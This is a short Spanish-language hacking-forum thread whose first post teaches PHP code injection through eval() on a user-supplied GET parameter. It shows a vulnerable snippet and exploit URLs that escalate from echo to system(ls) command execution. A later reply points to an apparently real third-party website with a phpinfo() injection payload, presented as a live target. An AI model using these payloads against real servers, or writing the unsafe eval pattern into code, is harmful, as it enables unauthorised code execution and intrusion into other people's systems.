PHP Injection

[vZor]

PHP Injection

¿De Que se trata?

Se trata de un bug que nos permite ejecutar codigo php dentro de un script que use la funcion eval() junto algun parametro que pueda ser modificado por el usuario.

Ejemplo de codigo vulnerable

Código:

<?php
$var=$_GET['var'];
eval('$juaz = '.$var.';');
?>

Explicacion / Como explotarlo

Supongamos que tenemos el codigo anterior, para inyectar nuestro code primero tenemos que terminar la expresion anterior para que no nos tire error.

Código:

http://pagina.com/vuln.php?var=1

Ahora inyectaremos nuestro code , para ello le añadimos ';' a la expresion anterior mas nuestro code

Código:

http://pagina.com/vuln.php?var=1;echo juanked

Y si todo va bien vemos que nos sale un 'juanked'

Si la config de php lo permite podemos ejecutar comandos

Código:

http://pagina.com/vuln.php?var=1;system(ls)

E inyectar lo que nos plazca xD

Esto es todo. Salu2

[vZer]

ya no hay paginas que usen ese "método" para pillar la variable.

[vZor]

Todavia hay webs viejas que tienen php injection


Vease

Código:

http://www.xbomber.co.uk/taggerLE/tags.php?foo=%22.phpinfo().%22

[vZer]

Todavia hay webs viejas que tienen php injection


Vease

Código:

http://www.xbomber.co.uk/taggerLE/tags.php?foo=%22.phpinfo().%22

pocas...

[Rawr]

Bonito codigo, lastima que nos e usarlos xd